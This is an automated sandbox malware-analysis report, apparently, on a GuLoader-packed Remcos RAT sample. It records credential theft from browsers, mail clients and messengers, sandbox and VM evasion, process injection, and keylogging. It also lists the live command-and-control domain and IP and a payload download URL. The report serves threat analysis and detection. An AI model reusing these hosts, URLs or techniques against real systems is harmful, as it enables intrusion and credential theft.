              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
              Source: 2T10XBqS6g.exe, 00000000.00000002.29606946933.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEE
              Source: 2T10XBqS6g.exe, 00000000.00000002.29606946933.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE694
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611538392.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30666076495.0000000002C60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeWindow / User API: threadDelayed 3606Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeWindow / User API: threadDelayed 5383Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeWindow / User API: foregroundWindowGot 1757Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb3903.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeAPI coverage: 10.0 %
              Source: C:\Users\user\Desktop\2T10XBqS6g.exe TID: 5664Thread sleep count: 3606 > 30Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exe TID: 5076Thread sleep count: 84 > 30Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exe TID: 5076Thread sleep time: -42000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exe TID: 1384Thread sleep count: 5383 > 30Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exe TID: 1384Thread sleep time: -16149000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeThread sleep count: Count: 3606 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,2_2_33A310F1
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A36580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,2_2_33A36580
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00418981 memset,GetSystemInfo,3_2_00418981
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\eftermodnendes\ringeagt\Sufferers.GyrJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\Desktop\2T10XBqS6g.exeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\eftermodnendes\ringeagt\utidige.GauJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\AppData\Local\Temp\nsg374D.tmpJump to behavior
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: 2T10XBqS6g.exe, 00000000.00000002.29606946933.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe694
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
              Source: 2T10XBqS6g.exe, 00000000.00000002.29606946933.0000000000628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exee
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611538392.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30666076495.0000000002C60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
              Source: 2T10XBqS6g.exe, 00000000.00000002.29611654171.0000000004329000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0v
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeAPI call chain: ExitProcess graph end nodegraph_0-4386
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeAPI call chain: ExitProcess graph end nodegraph_0-4391
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeAPI call chain: ExitProcess graph end nodegraph_4-34113
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00403645 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A32639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A32639
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_70251BFF LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70251BFF
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A34AB4 mov eax, dword ptr fs:[00000030h]2_2_33A34AB4
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A3724E GetProcessHeap,2_2_33A3724E
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A32B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_33A32B1C
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A32639 IsProcessorFeaturePresent,LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A32639
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A360E2 LdrInitializeThunk,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_33A360E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: NULL target: C:\Users\user\Desktop\2T10XBqS6g.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: NULL target: C:\Users\user\Desktop\2T10XBqS6g.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: NULL target: C:\Users\user\Desktop\2T10XBqS6g.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe "C:\Users\user\Desktop\2T10XBqS6g.exe"Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\nvdplctrijrfvwgugtzctlhghmlwqfpj"Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\qxrz"Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\arwsnnw"Jump to behavior
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager_K
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerIG\\Sy:~
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerIG\H;.
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere$s
              Source: 2T10XBqS6g.exe, 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: 2T10XBqS6g.exe, 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000002.00000002.30665347634.0000000002888000.00000004.00000020.00020000.00000000.sdmp, logs.dat.2.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A32933 cpuid 2_2_33A32933
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A32264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_33A32264
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,4_2_004082CD
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00403645 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2T10XBqS6g.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: ESMTPPassword4_2_004033F0
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword4_2_00402DB3
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword4_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: 2T10XBqS6g.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 2T10XBqS6g.exe PID: 1256, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIGJump to behavior
              Source: Yara matchFile source: 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2T10XBqS6g.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              4
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              128
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets431
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
              Virtualization/Sandbox Evasion
              Cached Domain Credentials12
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture113
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590600 Sample: 2T10XBqS6g.exe Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 30 linktreewealth.zapto.org 2->30 32 teldrum.ro 2->32 34 geoplugin.net 2->34 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Antivirus detection for dropped file 2->52 54 9 other signatures 2->54 8 2T10XBqS6g.exe 23 2->8         started        signatures3 process4 file5 24 C:\Users\user\AppData\Local\...\System.dll, PE32 8->24 dropped 56 Detected unpacking (changes PE section rights) 8->56 58 Tries to steal Mail credentials (via file registry) 8->58 60 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->60 62 2 other signatures 8->62 12 2T10XBqS6g.exe 5 19 8->12         started        signatures6 process7 dnsIp8 36 linktreewealth.zapto.org 43.226.229.209, 3980, 49767, 49768 SOFTLAYERUS Hong Kong 12->36 38 teldrum.ro 109.99.162.14, 443, 49765 RTDBucharestRomaniaRO Romania 12->38 40 geoplugin.net 178.237.33.50, 49769, 80 ATOM86-ASATOM86NL Netherlands 12->40 26 C:\Users\user\AppData\...\Hovedrevisorat.bat, PE32 12->26 dropped 28 C:\ProgramData\remcos\logs.dat, data 12->28 dropped 64 Detected Remcos RAT 12->64 66 Tries to detect Any.run 12->66 68 Maps a DLL or memory area into another process 12->68 70 Installs a global keyboard hook 12->70 17 2T10XBqS6g.exe 1 12->17         started        20 2T10XBqS6g.exe 1 12->20         started        22 2T10XBqS6g.exe 2 12->22         started        file9 signatures10 process11 signatures12 42 Tries to steal Instant Messenger accounts or passwords 17->42 44 Tries to harvest and steal browser information (history, passwords, etc) 17->44 46 Tries to steal Mail credentials (via file / registry access) 20->46

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              2T10XBqS6g.exe33%VirustotalBrowse
              2T10XBqS6g.exe100%AviraTR/AD.NsisInject.bzfqp
              2T10XBqS6g.exe32%ReversingLabsWin32.Trojan.Guloader
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\tissedes\Hovedrevisorat.bat100%AviraTR/AD.NsisInject.bzfqp
              C:\Users\user\AppData\Local\Temp\nsb3903.tmp\System.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\tissedes\Hovedrevisorat.bat32%ReversingLabsWin32.Trojan.Guloader
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.binVentsDyrcrestereamuschilor.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
              linktreewealth.zapto.org0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
              http://ocsp.sca1b.amazontrust.com060%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              linktreewealth.zapto.org
              43.226.229.209
              truetrue
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  high
                  teldrum.ro
                  109.99.162.14
                  truefalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://teldrum.ro/NJrdZqNcCtz102.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    linktreewealth.zapto.orgtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://geoplugin.net/json.gpfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.jsbhvF184.tmp.3.drfalse
                        high
                        http://www.imvu.comr2T10XBqS6g.exe, 00000002.00000002.30678074728.0000000033A00000.00000040.10000000.00040000.00000000.sdmp, 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svgbhvF184.tmp.3.drfalse
                          high
                          https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpgbhvF184.tmp.3.drfalse
                            high
                            https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1bhvF184.tmp.3.drfalse
                              high
                              https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.pngbhvF184.tmp.3.drfalse
                                high
                                https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.jsbhvF184.tmp.3.drfalse
                                  high
                                  https://csp.withgoogle.com/csp/ads-programmablebhvF184.tmp.3.drfalse
                                    high
                                    http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.nirsoft.net2T10XBqS6g.exe, 00000003.00000002.29913752802.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                      high
                                      https://aefd.nelreports.net/api/report?cat=bingaotakbhvF184.tmp.3.drfalse
                                        high
                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2bhvF184.tmp.3.drfalse
                                          high
                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684bhvF184.tmp.3.drfalse
                                            high
                                            https://deff.nelreports.net/api/report?cat=msnbhvF184.tmp.3.drfalse
                                              high
